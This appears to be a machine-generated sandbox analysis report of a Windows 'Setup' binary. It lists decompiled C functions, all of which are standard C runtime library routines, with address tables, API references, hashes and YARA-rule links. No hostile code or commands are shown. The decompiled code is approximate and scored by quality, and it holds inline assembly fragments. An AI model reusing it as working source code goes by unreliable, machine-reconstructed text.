                                                                                                                                                                                              • Opcode ID: bb30a29eca9df1af496d5b485848046b5ad85fa8353f080c1c5e19dac7875be3
                                                                                                                                                                                              • Instruction ID: 9636b7de894c23e7cf28d8a00283acb903aa0cb9a1abe2f357db5673f100bfc4
                                                                                                                                                                                              • Opcode Fuzzy Hash: bb30a29eca9df1af496d5b485848046b5ad85fa8353f080c1c5e19dac7875be3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E014F71000109BFDF125F52CE45E9B3F65EF44358F014029BD48242A1DB7AD9B1EBAD
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0040B956 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 65%
                                                                                                                                                                                              			E0040B956() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x425990;
					_v28 =  *0x425988;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                                                                                                                                                                                              0x0040b95b
                                                                                                                                                                                              0x0040b963
                                                                                                                                                                                              0x0040b97a
                                                                                                                                                                                              0x0040b926
                                                                                                                                                                                              0x0040b92f
                                                                                                                                                                                              0x0040b93b
                                                                                                                                                                                              0x0040b93e
                                                                                                                                                                                              0x0040b941
                                                                                                                                                                                              0x0040b943
                                                                                                                                                                                              0x0040b946
                                                                                                                                                                                              0x0040b94b
                                                                                                                                                                                              0x0040b955
                                                                                                                                                                                              0x0040b94d
                                                                                                                                                                                              0x0040b951
                                                                                                                                                                                              0x0040b951
                                                                                                                                                                                              0x0040b965
                                                                                                                                                                                              0x0040b96b
                                                                                                                                                                                              0x0040b973
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040b975
                                                                                                                                                                                              0x0040b975
                                                                                                                                                                                              0x0040b979
                                                                                                                                                                                              0x0040b979
                                                                                                                                                                                              0x0040b973

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32,0040494F), ref: 0040B95B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040B96B
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                                                                              • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                                              • API String ID: 1646373207-3105848591
                                                                                                                                                                                              • Opcode ID: 9215154ac88450b21b8858e92f7fdb6ac523b473c8141ac5be827c3555b4dee8
                                                                                                                                                                                              • Instruction ID: 07c1d61247daac9a3df87410c208cb5be43ec07af15499675f12a5a6593db881
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9215154ac88450b21b8858e92f7fdb6ac523b473c8141ac5be827c3555b4dee8
                                                                                                                                                                                              • Instruction Fuzzy Hash: A4F03060B40A0AD2DF106BB1BC0E76F7A78FB80712FD105A19696F01D4DF3480B5939E
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00403AD2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                                                              			E00403AD2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v12;
				intOrPtr _v16;
				char _v48;
				char _v88;
				intOrPtr* _t19;
				intOrPtr* _t22;

				_push(0x44);
				E004070C4(E00417A47, __ebx, __edi, __esi);
				E00401030( &_v48, "invalid string position");
				_v12 = _v12 & 0x00000000;
				_t19 =  &_v88;
				E00403A4B(_t19,  &_v48);
				E004052CB( &_v88, 0x4282d0);
				asm("int3");
				_push(__esi);
				_t22 = _t19;
				E00401DF0(_t19, _v16);
				 *_t22 = 0x424ee0;
				return _t22;
			}









                                                                                                                                                                                              0x00403ad2
                                                                                                                                                                                              0x00403ad9
                                                                                                                                                                                              0x00403ae6
                                                                                                                                                                                              0x00403aeb
                                                                                                                                                                                              0x00403af3
                                                                                                                                                                                              0x00403af6
                                                                                                                                                                                              0x00403b04
                                                                                                                                                                                              0x00403b09
                                                                                                                                                                                              0x00403b0f
                                                                                                                                                                                              0x00403b13
                                                                                                                                                                                              0x00403b15
                                                                                                                                                                                              0x00403b1a
                                                                                                                                                                                              0x00403b24

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00403AD9
                                                                                                                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 00403AF6
                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00403B04
                                                                                                                                                                                                • Part of subcall function 004052CB: RaiseException.KERNEL32(?,?,00405581,?,?,?,?,?,00405581,#"@,00428078,00455F3C,00402223,00000000,00000000), ref: 0040530D
                                                                                                                                                                                                • Part of subcall function 00401DF0: std::exception::exception.LIBCMT ref: 00401DFE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • invalid string position, xrefs: 00403ADE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                              • String ID: invalid string position
                                                                                                                                                                                              • API String ID: 3355147766-1799206989
                                                                                                                                                                                              • Opcode ID: 6d9f56548ec3a8b1ad3fec2aaed7d9857ed1a42035c799e1cb134f6446edcb9b
                                                                                                                                                                                              • Instruction ID: d0b797b6c2f6cf3df58a927ff2b8893858741993eaea2ac1ceaaf564543d914a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d9f56548ec3a8b1ad3fec2aaed7d9857ed1a42035c799e1cb134f6446edcb9b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 72F0A73271025867C700EAD1D802ACE7F3CEF40364F50443FB200B7581DBB99A00CBA8
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00408018 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 74%
                                                                                                                                                                                              			E00408018(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				void* _t23;

				_t25 = __edi;
				_t24 = __edx;
				_t11 =  *((intOrPtr*)( *_a4));
				if(_t11 == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E0040BE6F(_t23, __edx, __edi, __eflags) + 0x90));
					if(__eflags > 0) {
						_t15 = E0040BE6F(_t23, __edx, __edi, __eflags) + 0x90;
						 *_t15 =  *_t15 - 1;
						__eflags =  *_t15;
					}
					goto L5;
				} else {
					_t32 = _t11 - 0xe06d7363;
					if(_t11 != 0xe06d7363) {
						L5:
						__eflags = 0;
						return 0;
					} else {
						 *(E0040BE6F(_t23, __edx, __edi, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
						_push(8);
						_push(0x4287b0);
						E0040D194(_t23, __edi, __esi);
						_t19 =  *((intOrPtr*)(E0040BE6F(_t23, __edx, _t25, _t32) + 0x78));
						if(_t19 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t19();
							_v8 = 0xfffffffe;
						}
						return E0040D1D9(E00408C35(_t23, _t24, _t25));
					}
				}
			}








                                                                                                                                                                                              0x00408018
                                                                                                                                                                                              0x00408018
                                                                                                                                                                                              0x00408022
                                                                                                                                                                                              0x00408029
                                                                                                                                                                                              0x00408048
                                                                                                                                                                                              0x0040804f
                                                                                                                                                                                              0x00408056
                                                                                                                                                                                              0x0040805b
                                                                                                                                                                                              0x0040805b
                                                                                                                                                                                              0x0040805b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040802b
                                                                                                                                                                                              0x0040802b
                                                                                                                                                                                              0x00408030
                                                                                                                                                                                              0x0040805d
                                                                                                                                                                                              0x0040805d
                                                                                                                                                                                              0x00408060
                                                                                                                                                                                              0x00408032
                                                                                                                                                                                              0x00408037
                                                                                                                                                                                              0x0040c145
                                                                                                                                                                                              0x0040c147
                                                                                                                                                                                              0x0040c14c
                                                                                                                                                                                              0x0040c156
                                                                                                                                                                                              0x0040c15b
                                                                                                                                                                                              0x0040c15d
                                                                                                                                                                                              0x0040c161
                                                                                                                                                                                              0x0040c16c
                                                                                                                                                                                              0x0040c16c
                                                                                                                                                                                              0x0040c17d
                                                                                                                                                                                              0x0040c17d
                                                                                                                                                                                              0x00408030

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __getptd.LIBCMT ref: 00408032
                                                                                                                                                                                                • Part of subcall function 0040BE6F: __getptd_noexit.LIBCMT ref: 0040BE72
                                                                                                                                                                                                • Part of subcall function 0040BE6F: __amsg_exit.LIBCMT ref: 0040BE7F
                                                                                                                                                                                              • __getptd.LIBCMT ref: 00408043
                                                                                                                                                                                              • __getptd.LIBCMT ref: 00408051
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                              • String ID: MOC
                                                                                                                                                                                              • API String ID: 803148776-624257665
                                                                                                                                                                                              • Opcode ID: cf30a4a3d2648e8a12da771fc515db131d6ed69bed28103ae2b8a2bbf5ee1fc4
                                                                                                                                                                                              • Instruction ID: 8f8fdd1f1fc0e816f090f8471e26f44ddf7ce92810c2dbf5dccd2bb0a7139796
                                                                                                                                                                                              • Opcode Fuzzy Hash: cf30a4a3d2648e8a12da771fc515db131d6ed69bed28103ae2b8a2bbf5ee1fc4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 80E04F311002088FC710AF79D146B6A3395EB46318F1604BBE54CDB3A3CB3CE84495DA
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 004077DD Relevance: 6.1, APIs: 4, Instructions: 137COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                                                              			E004077DD(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0040D462(_t90, _t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E0040EB22(_t90, _t98, _t100));
										_t74 = E0040F2D0(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E004074F9(_t90, _t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E00404970(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E0040A982(_t105);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E004051FD(_t90, 0, _t100);
					goto L4;
				}
			}





























                                                                                                                                                                                              0x004077dd
                                                                                                                                                                                              0x004077ed
                                                                                                                                                                                              0x00407813
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004077f4
                                                                                                                                                                                              0x004077f4
                                                                                                                                                                                              0x004077f7
                                                                                                                                                                                              0x004077f9
                                                                                                                                                                                              0x0040781a
                                                                                                                                                                                              0x0040781d
                                                                                                                                                                                              0x0040781f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00407821
                                                                                                                                                                                              0x00407826
                                                                                                                                                                                              0x00407829
                                                                                                                                                                                              0x0040782c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00407831
                                                                                                                                                                                              0x00407835
                                                                                                                                                                                              0x0040783c
                                                                                                                                                                                              0x0040783f
                                                                                                                                                                                              0x00407842
                                                                                                                                                                                              0x00407844
                                                                                                                                                                                              0x0040784e
                                                                                                                                                                                              0x00407846
                                                                                                                                                                                              0x00407849
                                                                                                                                                                                              0x00407849
                                                                                                                                                                                              0x00407855
                                                                                                                                                                                              0x00407857
                                                                                                                                                                                              0x0040791c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040785d
                                                                                                                                                                                              0x0040785d
                                                                                                                                                                                              0x00407860
                                                                                                                                                                                              0x00407860
                                                                                                                                                                                              0x00407866
                                                                                                                                                                                              0x00407897
                                                                                                                                                                                              0x00407897
                                                                                                                                                                                              0x0040789a
                                                                                                                                                                                              0x004078f3
                                                                                                                                                                                              0x004078fa
                                                                                                                                                                                              0x004078fd
                                                                                                                                                                                              0x00407928
                                                                                                                                                                                              0x00407928
                                                                                                                                                                                              0x0040792a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040792e
                                                                                                                                                                                              0x004078ff
                                                                                                                                                                                              0x00407902
                                                                                                                                                                                              0x00407905
                                                                                                                                                                                              0x00407906
                                                                                                                                                                                              0x00407909
                                                                                                                                                                                              0x0040790b
                                                                                                                                                                                              0x0040790d
                                                                                                                                                                                              0x0040790d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040790b
                                                                                                                                                                                              0x0040789c
                                                                                                                                                                                              0x0040789e
                                                                                                                                                                                              0x004078ab
                                                                                                                                                                                              0x004078ab
                                                                                                                                                                                              0x004078af
                                                                                                                                                                                              0x004078b1
                                                                                                                                                                                              0x004078b5
                                                                                                                                                                                              0x004078b7
                                                                                                                                                                                              0x004078ba
                                                                                                                                                                                              0x004078ba
                                                                                                                                                                                              0x004078ba
                                                                                                                                                                                              0x004078bc
                                                                                                                                                                                              0x004078bd
                                                                                                                                                                                              0x004078c7
                                                                                                                                                                                              0x004078c8
                                                                                                                                                                                              0x004078cd
                                                                                                                                                                                              0x004078d0
                                                                                                                                                                                              0x004078d3
                                                                                                                                                                                              0x00407936
                                                                                                                                                                                              0x00407936
                                                                                                                                                                                              0x0040793a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004078d5
                                                                                                                                                                                              0x004078d5
                                                                                                                                                                                              0x004078d7
                                                                                                                                                                                              0x004078d9
                                                                                                                                                                                              0x004078db
                                                                                                                                                                                              0x004078db
                                                                                                                                                                                              0x004078dd
                                                                                                                                                                                              0x004078e0
                                                                                                                                                                                              0x004078e2
                                                                                                                                                                                              0x004078e4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004078e6
                                                                                                                                                                                              0x004078e6
                                                                                                                                                                                              0x004078e6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004078e6
                                                                                                                                                                                              0x004078e4
                                                                                                                                                                                              0x004078d3
                                                                                                                                                                                              0x004078a1
                                                                                                                                                                                              0x004078a7
                                                                                                                                                                                              0x004078a9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004078a9
                                                                                                                                                                                              0x00407868
                                                                                                                                                                                              0x0040786b
                                                                                                                                                                                              0x0040786d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040786f
                                                                                                                                                                                              0x00407924
                                                                                                                                                                                              0x00407924
                                                                                                                                                                                              0x00407924
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00407924
                                                                                                                                                                                              0x00407875
                                                                                                                                                                                              0x00407877
                                                                                                                                                                                              0x00407879
                                                                                                                                                                                              0x0040787b
                                                                                                                                                                                              0x0040787b
                                                                                                                                                                                              0x00407883
                                                                                                                                                                                              0x00407888
                                                                                                                                                                                              0x0040788b
                                                                                                                                                                                              0x0040788d
                                                                                                                                                                                              0x00407890
                                                                                                                                                                                              0x00407892
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00407914
                                                                                                                                                                                              0x00407914
                                                                                                                                                                                              0x00407914
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040785d
                                                                                                                                                                                              0x00407857
                                                                                                                                                                                              0x004077fb
                                                                                                                                                                                              0x004077fb
                                                                                                                                                                                              0x00407800
                                                                                                                                                                                              0x00407801
                                                                                                                                                                                              0x00407802
                                                                                                                                                                                              0x00407803
                                                                                                                                                                                              0x00407804
                                                                                                                                                                                              0x00407805
                                                                                                                                                                                              0x0040780b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00407810

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __flush.LIBCMT ref: 004078A1
                                                                                                                                                                                              • __fileno.LIBCMT ref: 004078C1
                                                                                                                                                                                              • __locking.LIBCMT ref: 004078C8
                                                                                                                                                                                              • __flsbuf.LIBCMT ref: 004078F3
                                                                                                                                                                                                • Part of subcall function 0040A982: __getptd_noexit.LIBCMT ref: 0040A982
                                                                                                                                                                                                • Part of subcall function 004051FD: __decode_pointer.LIBCMT ref: 00405208
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3240763771-0
                                                                                                                                                                                              • Opcode ID: 4a7bb8ee02ac61fb0b6a8b15e29fe539fde210a1ab53a41da82f124eb62e1d3d
                                                                                                                                                                                              • Instruction ID: 466d5ea59597bd610819268632cb4bd882d49fd9f84eb0bc036b01aa0662c61b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a7bb8ee02ac61fb0b6a8b15e29fe539fde210a1ab53a41da82f124eb62e1d3d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A41F672E046049BDB24AF69C84495FBBB5AF80350B24C53EE455B72D0E778FD41CB1A
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00414BA6 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00414BA6(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E00409DDD( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E004126EB( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0040A982(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                                                                                                                                              0x00414bb0
                                                                                                                                                                                              0x00414bb7
                                                                                                                                                                                              0x00414bce
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414bbe
                                                                                                                                                                                              0x00414bc0
                                                                                                                                                                                              0x00414bda
                                                                                                                                                                                              0x00414bdf
                                                                                                                                                                                              0x00414be2
                                                                                                                                                                                              0x00414be5
                                                                                                                                                                                              0x00414c0e
                                                                                                                                                                                              0x00414c15
                                                                                                                                                                                              0x00414c17
                                                                                                                                                                                              0x00414c98
                                                                                                                                                                                              0x00414cb3
                                                                                                                                                                                              0x00414cb5
                                                                                                                                                                                              0x00414bf5
                                                                                                                                                                                              0x00414bf5
                                                                                                                                                                                              0x00414bf8
                                                                                                                                                                                              0x00414bfa
                                                                                                                                                                                              0x00414bfd
                                                                                                                                                                                              0x00414bfd
                                                                                                                                                                                              0x00414bfd
                                                                                                                                                                                              0x00414bfd
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414c03
                                                                                                                                                                                              0x00414c77
                                                                                                                                                                                              0x00414c77
                                                                                                                                                                                              0x00414c7c
                                                                                                                                                                                              0x00414c82
                                                                                                                                                                                              0x00414c85
                                                                                                                                                                                              0x00414c87
                                                                                                                                                                                              0x00414c8a
                                                                                                                                                                                              0x00414c8a
                                                                                                                                                                                              0x00414c8a
                                                                                                                                                                                              0x00414c8a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414c8e
                                                                                                                                                                                              0x00414c19
                                                                                                                                                                                              0x00414c1c
                                                                                                                                                                                              0x00414c22
                                                                                                                                                                                              0x00414c25
                                                                                                                                                                                              0x00414c4c
